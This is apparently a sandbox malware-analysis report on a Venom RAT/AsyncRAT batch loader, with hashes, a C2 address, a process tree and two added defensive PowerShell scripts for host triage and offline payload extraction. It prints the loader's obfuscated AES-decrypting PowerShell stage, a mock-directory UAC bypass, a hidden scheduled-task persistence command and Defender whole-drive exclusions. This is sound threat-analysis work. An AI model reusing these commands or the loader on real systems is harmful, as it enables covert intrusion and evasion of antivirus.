Overview

Overall score: 10

Task                          Platform              Score
Static                        static                10
Guna.UI2.dll                  windows7-x64          1
Guna.UI2.dll                  windows10-2004-x64    1
InjectorStarter.bat           windows7-x64          1
InjectorStarter.bat           windows10-2004-x64    10
Newtonsoft.Json.dll           windows7-x64          1
Newtonsoft.Json.dll           windows10-2004-x64    1
bin/api-ms...-0.dll (x11)     windows10-2004-x64    1 (each)
bin/clrcom...on.dll           windows7-x64          1
bin/clrcom...on.dll           windows10-2004-x64    1
bin/clretwrc.dll              windows7-x64          1
bin/clretwrc.dll              windows10-2004-x64    1
dnlib.dll                     windows7-x64          1
dnlib.dll                     windows10-2004-x64    1

(The eleven bin/api-ms...-0.dll rows are the api-ms-win-crt-*-l1-1-0.dll tasks listed in full under "Behavioral tasks" below. Only the static scan and the InjectorStarter.bat run on Windows 10 reach the maximum score; every other task scored 1.)

Analysis
  Max time kernel:   133s
  Max time network:  156s
  Platform:          windows10-2004_x64
  Resource:          win10v2004-20240802-en
  Resource tags:     arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  Submitted:         14-09-2024 01:32
Behavioral tasks

Task           Sample                                     Resource
behavioral1    Guna.UI2.dll                               win7-20240903-en
behavioral2    Guna.UI2.dll                               win10v2004-20240802-en
behavioral3    InjectorStarter.bat                        win7-20240903-en
behavioral4    InjectorStarter.bat                        win10v2004-20240802-en
behavioral5    Newtonsoft.Json.dll                        win7-20240903-en
behavioral6    Newtonsoft.Json.dll                        win10v2004-20240802-en
behavioral7    bin/api-ms-win-crt-heap-l1-1-0.dll         win10v2004-20240802-en
behavioral8    bin/api-ms-win-crt-locale-l1-1-0.dll       win10v2004-20240802-en
behavioral9    bin/api-ms-win-crt-math-l1-1-0.dll         win10v2004-20240802-en
behavioral10   bin/api-ms-win-crt-multibyte-l1-1-0.dll    win10v2004-20240802-en
behavioral11   bin/api-ms-win-crt-private-l1-1-0.dll      win10v2004-20240802-en
behavioral12   bin/api-ms-win-crt-process-l1-1-0.dll      win10v2004-20240802-en
behavioral13   bin/api-ms-win-crt-runtime-l1-1-0.dll      win10v2004-20240802-en
behavioral14   bin/api-ms-win-crt-stdio-l1-1-0.dll        win10v2004-20240802-en
behavioral15   bin/api-ms-win-crt-string-l1-1-0.dll       win10v2004-20240802-en
behavioral16   bin/api-ms-win-crt-time-l1-1-0.dll         win10v2004-20240802-en
behavioral17   bin/api-ms-win-crt-utility-l1-1-0.dll      win10v2004-20240802-en
behavioral18   bin/clrcompression.dll                     win7-20240903-en
behavioral19   bin/clrcompression.dll                     win10v2004-20240802-en
behavioral20   bin/clretwrc.dll                           win7-20240903-en
behavioral21   bin/clretwrc.dll                           win10v2004-20240802-en
behavioral22   dnlib.dll                                  win7-20240903-en
behavioral23   dnlib.dll                                  win10v2004-20240802-en

The detailed results below are from behavioral4 (InjectorStarter.bat on win10v2004-20240802-en).
General

  Target:  InjectorStarter.bat
  Size:    167KB
  MD5:     46d96a835e60ee73339082c3c7eb62cc
  SHA1:    b9c668ea33db469cd1ed60bd8d31e5347975a72c
  SHA256:  c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a
  SHA512:  ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497
  SSDEEP:  3072:rKTAIOdL6ZlESFX0Wb8s7CqRa8gZbN8/Z2LfvTijJij6wTKGJWD:tlumcVb8sOqRbgA/Cf8+6Sq
Malware Config

Extracted (family: asyncrat)
  Version:         Venom RAT + HVNC + Stealer + Grabber v6.0.2
  Botnet:          Default
  C2:              41.216.183.109:4449
  Mutex:           eqrgkllk45thea
  delay:           1
  install:         false
  install_folder:  %AppData%
Signatures

Async RAT payload (1 IoC)
  resource: behavioral4/memory/4820-118-0x00000234FC190000-0x00000234FC1A8000-memory.dmp
  yara_rule: family_asyncrat

Blocklisted process makes network request (6 IoCs)
  flow   pid    process
  19     4820   powershell.exe
  34     4820   powershell.exe
  37     4820   powershell.exe
  39     4820   powershell.exe
  44     4820   powershell.exe
  45     4820   powershell.exe

Command and Scripting Interpreter: PowerShell (1 TTP, 7 IoCs)
  Runs PowerShell to modify Windows Defender settings, adding exclusions for file extensions, paths and processes.
  pids (all powershell.exe): 4112, 232, 4028, 2924, 3548, 3236, 1296

Executes dropped EXE (1 IoC)
  pid 2488   ComputerDefaults.exe

Loads dropped DLL (1 IoC)
  pid 2488   ComputerDefaults.exe

Indicator Removal: File Deletion (1 TTP)
  Adversaries may delete files left behind by the actions of their intrusion activity.

Suspicious behavior: EnumeratesProcesses (38 IoCs)
  powershell.exe, pid (hit count): 440 (2), 3548 (2), 4820 (10), 3236 (3), 1296 (3), 1676 (3), 4028 (3), 232 (3), 1712 (3), 2924 (3), 4112 (3)

Suspicious use of AdjustPrivilegeToken (64 IoCs, all powershell.exe)
  SeDebugPrivilege only: pids 440, 3548, 4820, 3236, 1296
  pid 1676: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
  pid 4028: the same 22-token sequence as pid 1676, followed by a second run of SeIncreaseQuotaPrivilege through SeRemoteShutdownPrivilege (15 tokens; the list is capped at 64 entries)

Suspicious use of SetWindowsHookEx (1 IoC)
  pid 4820   powershell.exe

Suspicious use of WriteProcessMemory (34 IoCs; each pair is recorded twice)
  parent pid / process              child pid   procid_target
  4508  cmd.exe                     3616        87
  4508  cmd.exe                     440         88
  440   powershell.exe              3548        91
  440   powershell.exe              5100        94
  5100  cmd.exe                     2488        96
  2488  ComputerDefaults.exe        2188        97
  2188  cmd.exe                     5012        99
  2188  cmd.exe                     4820        100
  4820  powershell.exe              3236        101
  4820  powershell.exe              1296        103
  4820  powershell.exe              1676        105
  4820  powershell.exe              4028        107
  4820  powershell.exe              232         111
  440   powershell.exe              5032        113
  440   powershell.exe              1712        115
  440   powershell.exe              2924        117
  440   powershell.exe              4112        119
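The signatures above (Defender exclusions added from PowerShell, a dropped ComputerDefaults.exe, file deletion) map to concrete host artefacts that the process tree below spells out: a scheduled task named 'OneNote startup_str' that runs SC.cmd from the user's Roaming profile at highest run level, whole-drive exclusions in Microsoft Defender, a mock "C:\Windows \" directory (trailing space) used to launch the auto-elevating ComputerDefaults.exe, and the RAT's C2 at 41.216.183.109:4449. The following triage script is an added example written for this page, not part of the sandbox report; the function name, the output shape and the "user-writable path" regex are this example's own choices, and the indicators it looks for are the ones the report records.

```powershell
# Added example (not from the sandbox report): live host triage for the
# persistence and defence-evasion artefacts recorded in this run.
# Run from an elevated PowerShell on the suspected host.

function Find-VenomHostArtifacts {
    [CmdletBinding()]
    param(
        [string] $TaskName    = 'OneNote startup_str',     # name used by this sample
        [string] $C2Address   = '41.216.183.109',          # extracted AsyncRAT C2
        [int]    $C2Port      = 4449,
        [string] $SystemDrive = $env:SystemDrive
    )
    $findings = [System.Collections.Generic.List[object]]::new()
    # Hypothetical heuristic: any task action launched from a per-user AppData path.
    $userWritable = '(?i)\\Users\\[^\\]+\\AppData\\(Roaming|Local)\\'

    # 1. Scheduled tasks: the known task name, or any action run from AppData.
    foreach ($t in Get-ScheduledTask -ErrorAction SilentlyContinue) {
        foreach ($a in $t.Actions) {
            $cmd = "$($a.Execute) $($a.Arguments)".Trim()
            if ($t.TaskName -eq $TaskName -or $cmd -match $userWritable) {
                $findings.Add([pscustomobject]@{
                    Kind   = 'ScheduledTask'
                    Detail = "$($t.TaskPath)$($t.TaskName) -> $cmd (RunLevel=$($t.Principal.RunLevel))"
                })
            }
        }
    }

    # 2. Defender path exclusions that cover an entire drive root, e.g. 'C:\'.
    $mp = Get-MpPreference -ErrorAction SilentlyContinue
    foreach ($p in @($mp.ExclusionPath | Where-Object { $_ })) {
        if ($p -match '^[A-Za-z]:\\?$') {
            $findings.Add([pscustomobject]@{ Kind = 'DefenderExclusion'; Detail = $p })
        }
    }

    # 3. Mock trusted directory: a top-level folder whose name ends in whitespace
    #    ('C:\Windows \'). Enumerate instead of Test-Path, because Win32 path
    #    normalisation silently strips trailing spaces and would report the real
    #    C:\Windows instead.
    foreach ($d in Get-ChildItem -LiteralPath "$SystemDrive\" -Directory -Force -ErrorAction SilentlyContinue) {
        if ($d.Name -match '\s$') {
            $findings.Add([pscustomobject]@{ Kind = 'MockTrustedDir'; Detail = "'$($d.FullName)'" })
        }
    }

    # 4. The re-launch stage the task points at, in every user's Roaming profile.
    foreach ($f in Get-ChildItem -Path "$SystemDrive\Users\*\AppData\Roaming\SC.cmd" -Force -ErrorAction SilentlyContinue) {
        $findings.Add([pscustomobject]@{ Kind = 'DroppedStage'; Detail = $f.FullName })
    }

    # 5. A live socket to the extracted C2 endpoint, with the owning process.
    foreach ($c in Get-NetTCPConnection -RemoteAddress $C2Address -RemotePort $C2Port -ErrorAction SilentlyContinue) {
        $findings.Add([pscustomobject]@{
            Kind   = 'C2Connection'
            Detail = "pid $($c.OwningProcess) -> $($c.RemoteAddress):$($c.RemotePort) ($($c.State))"
        })
    }

    return $findings
}

# Usage: Find-VenomHostArtifacts | Format-Table -AutoSize
```

The exclusion check deliberately flags any drive-root exclusion, not just C:\, D:\ and F:\: a whole-drive exclusion is never a legitimate configuration on an endpoint, so the match is reliable regardless of which letters a given sample picks. Remove hits in the order task, exclusion, dropped stage, mock directory, so the RAT cannot re-establish itself while you clean up.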
Processes
(PID, image, full command line and the signatures each process triggered; indentation shows parent/child, bracketed depth matches the report's level markers)

[1] PID 4508  C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat"
      - Suspicious use of WriteProcessMemory

  [2] PID 3616  C:\Windows\system32\cmd.exe
        The batch file echoes its embedded PowerShell stage; the sibling powershell.exe (PID 440) is started with no arguments and evidently receives this text on standard input. Reformatted here for readability, otherwise verbatim:

        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;
        function decrypt_function($param_var){
            $aes_var=[System.Security.Cryptography.Aes]::Create();
            $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC;
            $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;
            $aes_var.Key=[System.Convert]::FromBase64String('wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ=');
            $aes_var.IV=[System.Convert]::FromBase64String('Y2EA3S2a60w++GUnYA46Lg==');
            $decryptor_var=$aes_var.CreateDecryptor();
            $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length);
            $decryptor_var.Dispose(); $aes_var.Dispose();
            $return_var;
        }
        function decompress_function($param_var){
            $GkmdP=New-Object System.IO.MemoryStream(,$param_var);
            $hiwNw=New-Object System.IO.MemoryStream;
            $GuFCf=New-Object System.IO.Compression.GZipStream($GkmdP, [IO.Compression.CompressionMode]::Decompress);
            $GuFCf.CopyTo($hiwNw); $GuFCf.Dispose(); $GkmdP.Dispose(); $hiwNw.Dispose();
            $hiwNw.ToArray();
        }
        function execute_function($param_var,$param2_var){
            $PazRF=[System.Reflection.Assembly]::Load([byte[]]$param_var);
            $SUZbj=$PazRF.EntryPoint;
            $SUZbj.Invoke($null, $param2_var);
        }
        $ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\InjectorStarter.bat';
        $host.UI.RawUI.WindowTitle = $ZeAWF;
        $dobXh=[System.IO.File]::ReadAllText($ZeAWF).Split([Environment]::NewLine);
        foreach ($YQfVl in $dobXh) { if ($YQfVl.StartsWith('LUChidbwYzZpSAhDIbmN')) { $UhuSz=$YQfVl.Substring(20); break; }}
        $payloads_var=[string[]]$UhuSz.Split('\');
        $payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));
        $payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));
        $payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));
        execute_function $payload1_var $null;
        execute_function $payload2_var $null;
        execute_function $payload3_var (,[string[]] (''));
        "

        In short: the loader re-reads the .bat it was launched from, takes the one line that begins with the 20-character marker LUChidbwYzZpSAhDIbmN, splits the remainder on '\' into three blobs, undoes a two-character alphabet substitution ('#' for '/', '@' for 'A'), base64-decodes, AES-256-CBC-decrypts with the hard-coded key and IV, gunzips, and loads each result in memory with Assembly.Load(). Payloads 1 and 2 are invoked with no arguments; payload 3 gets an empty string[] like a conventional Main(string[] args).

  [2] PID 440  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        - Suspicious use of WriteProcessMemory

    [3] PID 3548  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken

    [3] PID 5100  C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
          (note the trailing space in "C:\Windows \": this is a directory the loader created, not the real system directory)
          - Suspicious use of WriteProcessMemory

      [4] PID 2488  C:\Windows \System32\ComputerDefaults.exe
            "C:\Windows \System32\ComputerDefaults.exe"
            - Executes dropped EXE
            - Loads dropped DLL
            - Suspicious use of WriteProcessMemory

        [5] PID 2188  C:\Windows\SYSTEM32\cmd.exe
              cmd.exe /c SC.cmd
              - Suspicious use of WriteProcessMemory

          [6] PID 5012  C:\Windows\system32\cmd.exe
                The same cmd.exe /S /D /c" echo cls;powershell -w hidden; ... " stage as PID 3616, identical except for
                $ZeAWF = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';
                i.e. the loader runs a second time from the dropped copy of itself.

          [6] PID 4820  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
                - Blocklisted process makes network request
                - Suspicious behavior: EnumeratesProcesses
                - Suspicious use of AdjustPrivilegeToken
                - Suspicious use of SetWindowsHookEx
                - Suspicious use of WriteProcessMemory

            [7] PID 3236  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken

            [7] PID 1296  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken

            [7] PID 1676  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\SC')
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken

            [7] PID 4028  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses
                  - Suspicious use of AdjustPrivilegeToken

            [7] PID 232  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                  - Command and Scripting Interpreter: PowerShell
                  - Suspicious behavior: EnumeratesProcesses

    [3] PID 5032  C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q

    [3] PID 1712  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\InjectorStarter')
          - Suspicious behavior: EnumeratesProcesses

    [3] PID 2924  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote startup_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\SC.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses

    [3] PID 4112  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
          - Command and Scripting Interpreter: PowerShell
          - Suspicious behavior: EnumeratesProcesses

Both the first-stage PowerShell (PID 440) and the re-launched one (PID 4820) perform the same housekeeping: check whether a scheduled task already points at the loader, register 'OneNote startup_str' to run C:\Users\Admin\AppData\Roaming\SC.cmd at logon with -RunLevel Highest, exclude the C:\, D:\ and F:\ drive roots from Microsoft Defender, and delete the "C:\Windows \" directory (via rmdir from PID 440 and via Remove-Item on the \\?\ extended path from PID 4820, which bypasses the trailing-space normalisation that would otherwise make the path resolve to the real C:\Windows).
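Because the three .NET stages are decrypted and loaded purely in memory, the quickest way to get them on disk for static analysis is to replay the loader's decode chain without the final Assembly.Load(). The script below is an added example written for this page, not code from the sample or the sandbox: the marker string, key, IV, alphabet substitution and GZip step are exactly those quoted in the command line above; the function name, output directory and the PE-header check are this example's own choices.

```powershell
# Added example (not from the sandbox report): offline re-implementation of the
# loader's decode chain. Run on an isolated analysis VM against a copied sample;
# nothing here executes the recovered payloads.

function Get-VenomStagePayloads {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)] [string] $Path,                         # the .bat/.cmd to unpack
        [string] $OutDir = (Join-Path $PWD 'extracted'),               # example's own choice
        [string] $Marker = 'LUChidbwYzZpSAhDIbmN',                     # from the loader
        [string] $KeyB64 = 'wGRUA3G1Id5Yrl+/tKZd770scSjou27cv5oSvt7BwaQ=',
        [string] $IvB64  = 'Y2EA3S2a60w++GUnYA46Lg=='
    )

    # 1. The payloads live on the single line that starts with the marker.
    $blobLine = Get-Content -LiteralPath $Path |
        Where-Object { $_.StartsWith($Marker) } |
        Select-Object -First 1
    if (-not $blobLine) { throw "Marker '$Marker' not found in $Path" }

    # AES-256-CBC / PKCS7 with the hard-coded key and IV, as in the loader.
    $aes = [System.Security.Cryptography.Aes]::Create()
    $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    $aes.Key = [Convert]::FromBase64String($KeyB64)
    $aes.IV  = [Convert]::FromBase64String($IvB64)

    New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
    $results = @()
    $i = 0
    foreach ($blob in $blobLine.Substring($Marker.Length).Split('\')) {
        $i++
        # 2. Undo the custom alphabet: '#' stands in for '/', '@' for 'A'.
        $cipher = [Convert]::FromBase64String($blob.Replace('#', '/').Replace('@', 'A'))

        # 3. Decrypt.
        $dec = $aes.CreateDecryptor()
        $gz  = $dec.TransformFinalBlock($cipher, 0, $cipher.Length)
        $dec.Dispose()

        # 4. GZip-decompress to the raw assembly bytes.
        $in  = New-Object System.IO.MemoryStream(,$gz)
        $out = New-Object System.IO.MemoryStream
        $gzs = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
        $gzs.CopyTo($out); $gzs.Dispose(); $in.Dispose()
        $bytes = $out.ToArray(); $out.Dispose()

        # 5. Write to disk, hash, and note whether it is a PE ('MZ') at all.
        $file = Join-Path $OutDir ("payload{0}.bin" -f $i)
        [System.IO.File]::WriteAllBytes($file, $bytes)
        $results += [pscustomobject]@{
            Index  = $i
            File   = $file
            Size   = $bytes.Length
            IsPE   = ($bytes.Length -gt 2 -and $bytes[0] -eq 0x4D -and $bytes[1] -eq 0x5A)
            SHA256 = (Get-FileHash -Algorithm SHA256 -LiteralPath $file).Hash
        }
    }
    $aes.Dispose()
    return $results
}

# Usage: Get-VenomStagePayloads -Path .\InjectorStarter.bat | Format-Table -AutoSize
```

The same function works on the dropped SC.cmd, since the second loader instance (PID 5012) is identical apart from the path it reads. Hand the payload3 output (the stage invoked with a string[] argument) to a .NET decompiler first; that is where a normal Main entry point and the RAT configuration are most likely to be, which the sandbox's family_asyncrat memory hit on PID 4820 also suggests.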
Network
MITRE ATT&CK Enterprise v15
Downloads (files written during the run)

1. 3KB
   MD5     3f01549ee3e4c18244797530b588dad9
   SHA1    3e87863fc06995fe4b741357c68931221d6cc0b9
   SHA256  36b51e575810b6af6fc5e778ce0f228bc7797cd3224839b00829ca166fa13f9a
   SHA512  73843215228865a4186ac3709bf2896f0f68da0ba3601cc20226203dd429a2ad9817b904a45f6b0456b8be68deebf3b011742a923ce4a77c0c6f3a155522ab50

2. 53KB
   MD5     a26df49623eff12a70a93f649776dab7
   SHA1    efb53bd0df3ac34bd119adf8788127ad57e53803
   SHA256  4ebde1c12625cb55034d47e5169f709b0bd02a8caa76b5b9854efad7f4710245
   SHA512  e5f9b8645fb2a50763fcbffe877ca03e9cadf099fe2d510b74bfa9ff18d0a6563d11160e00f495eeefebde63450d0ade8d6b6a824e68bd8a59e1971dc842709c

3. 2KB
   MD5     005bc2ef5a9d890fb2297be6a36f01c2
   SHA1    0c52adee1316c54b0bfdc510c0963196e7ebb430
   SHA256  342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
   SHA512  f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22

4. 2KB
   MD5     e4de99c1795fd54aa87da05fa39c199c
   SHA1    dfaaac2de1490fae01104f0a6853a9d8fe39a9d7
   SHA256  23c35f4fcd9f110592d3ff34490e261efbcf6c73aa753887479197fd15289457
   SHA512  796b6d3f7b9a336bc347eae8fb11cdbf2ae2ad73aae58de79e096c3ad57bd45eadddae445a95c4ee7452554568d7ab55b0307972b24e2ff75eae4a098ba9e926

5. 1KB
   MD5     4373abae4880a277a3859f5734143a19
   SHA1    a71759a565541fba5e1ee8d3fceee7645ed75054
   SHA256  f151ef7e7996f479ba2ab9334d50ff36ae85917c4451614a254b121d328eb607
   SHA512  0af72c0f2ff8716e99a84e67ef4bb921e389459b90f76ca17340384aabcdf41a10c2191801c8d343b649cb547ea8182ca367b7aa6176d7304394be4b9bfe8718

6. 1KB
   MD5     81b640502b0c25ab216c6b6ad82ba7bd
   SHA1    1b43e1fead8428aee3b764bcacc3795021277be9
   SHA256  4cf92d978f2a1fc5b80eda8a11f181603018d270fc8fe24daa634b954c75380f
   SHA512  842cfba04ddbd5336e16dbc1ab8e57a80541f0ab1da6260fcca53f7f441e4b1c4149bce2d74b23684a338a86aded2626008f33edb246871e178bda1272c8fa57

7. 944B
   MD5     c4bac001ce1ea76036b69ef6920fffe1
   SHA1    ce176b38f2ee4b300cbec04592f70b65b45491ed
   SHA256  2895ccfe721a7d966bb407b4bb713320d3fb11ceb793fcc84a751abb755ca1c6
   SHA512  e8616fb64a420202573cad3253b5714816b09522c8f466d0a42b77701d911146f501e3ec06e0b7d79f56d42ea2cc25c642ff64f57242bb609db039484b12ddc3

8. 1KB
   MD5     721b5709e8cf707b3371e9dcec3f8dbe
   SHA1    dca34cbf05583bd4ee731e732c0ff993eb4cfd13
   SHA256  df5a6fc77d68de7db1bc06f5f1f9609fb27df5ee90d57f7766860cb3bef14f43
   SHA512  ffcdce04c34fe269f898e599b95fff2306f9ab5e68e0255cb4c80cffedf262a0567b563317a94110e9f10467a5a340a71da83d0439b37d9e83ce76c5def8ca3d

9. 1KB
   MD5     73aa7bac9a76981286ae4d6ac4734b2d
   SHA1    6deb0456dbe856792c66e803427b599311fdda23
   SHA256  84397e930607b63ba9cfe6c4a4c472eb66d074526b8fe48d15856bc1a649aba6
   SHA512  0dcc91f38e59259a4217b27746a66b7a6dec07ade9478fcbdedcd21eecbf584175a2e12d48ea6945ddfa81ee24dd0de17b154225f32aaed7f730bf64474745d9

10. 664B
   MD5     c5a924d29f846b1d81e3c4df6cf310d0
   SHA1    e0cfbbf4666d649d229322c82ae6c1f3dda6c63a
   SHA256  a08aca12c8c39b70f38089a2009f7db55afaeb928eda54436a65ebfa9539e66d
   SHA512  f2a292dbb2c6e37d4adee20a1172f445fbf965dcea89e37827b84eb569a1045ee359267d5e6c7b326dcfbacbd96e410d4b6cdbdcd82a9d359501208415ed1158

11. 167KB (same hashes as the submitted InjectorStarter.bat under General; this is the loader's own copy of itself, cf. the dropped SC.cmd in the process tree)
   MD5     46d96a835e60ee73339082c3c7eb62cc
   SHA1    b9c668ea33db469cd1ed60bd8d31e5347975a72c
   SHA256  c11831adced48656b92417fa594e4037d1f42194cd134fef31f52e6cd4b35d4a
   SHA512  ca6705fb45e3712004702d903733cfd0dc91b63d0a41a6bb0531e18bedb6c57de8486f4e27aa8fff66c44acbcf2fad6a3b5267e9b69c144df917105e9c257497

12. 60B
   MD5     d17fe0a3f47be24a6453e9ef58c94641
   SHA1    6ab83620379fc69f80c0242105ddffd7d98d5d9d
   SHA256  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
   SHA512  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

13. 8B
   MD5     cf759e4c5f14fe3eec41b87ed756cea8
   SHA1    c27c796bb3c2fac929359563676f4ba1ffada1f5
   SHA256  c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761
   SHA512  c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b

14. 80KB
   MD5     d25a9e160e3b74ef2242023726f15416
   SHA1    27a9bb9d7628d442f9b5cf47711c906e3315755b
   SHA256  7b0334c329e40a542681bcaff610ae58ada8b1f77ff6477734c1b8b9a951ef4c
   SHA512  bafaee786c90c96a2f76d4bbcddbbf397a1afd82d55999081727900f3c2de8d2eba6b77d25c622de0c1e91c54259116bc37bc9f29471d1b387f78aaa4d276910

15. 103KB
   MD5     d4f7ff46bb9412b90e8f091f6a9115c3
   SHA1    e7c82eca0bd2c9969b036efd07bfb6a1e3a342cd
   SHA256  53493edddf3e4509f791d0e26ea80d8b2283aa95a0f4e263ebb8fc1e7d8d9c82
   SHA512  7bf7a9424f8540d4f867c53c3042fc91c7c4bf09f8c790d664908c61cce3d32a16fa286fff2d5b9aed3c25f645fdba50a2c91030eea9da1e8e7215c414e32a0d